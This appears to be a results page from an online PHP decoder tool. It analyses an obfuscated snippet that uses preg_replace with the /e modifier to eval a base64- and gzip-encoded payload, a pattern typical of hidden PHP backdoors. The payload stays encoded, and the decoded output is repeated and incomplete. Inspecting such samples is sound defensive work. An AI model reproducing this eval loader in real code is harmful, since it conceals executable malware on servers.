Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $payload="83QPy0p0t0hPNs6pSnEPK/F2DkoLMggLDa9MKfcyNCjwLzfwjorIKEhxKbYFAA==";preg_rep..

Decoded Output download

eval(base64_decode(gzinflate(base64_decode(83QPy0p0t0hPNs6pSnEPK/F2DkoLMggLDa9MKfcyNCjwLzfwjorIKEhxKbYFAA==),0)))eval(base64_decode(gzinflate(base64_decode(83QPy0p0t0hPNs6pSnEPK/F2DkoLMggLDa9MKfcyNCjwLzfwjorIKEhxKbYFAA==),0)));

Did this file decode correctly?

Original Code

<?php $payload="83QPy0p0t0hPNs6pSnEPK/F2DkoLMggLDa9MKfcyNCjwLzfwjorIKEhxKbYFAA==";preg_replace('/.*/e',"eval(base64_decode(gzinflate(base64_decode($payload),0)))",'.'); ?>

Function Calls

preg_replace 1

Variables

$payload 83QPy0p0t0hPNs6pSnEPK/F2DkoLMggLDa9MKfcyNCjwLzfwjorIKEhxKbYF..

Stats

MD5 1804742c5cfe3508e2c410a8c1420245
Eval Count 1
Decode Time 57 ms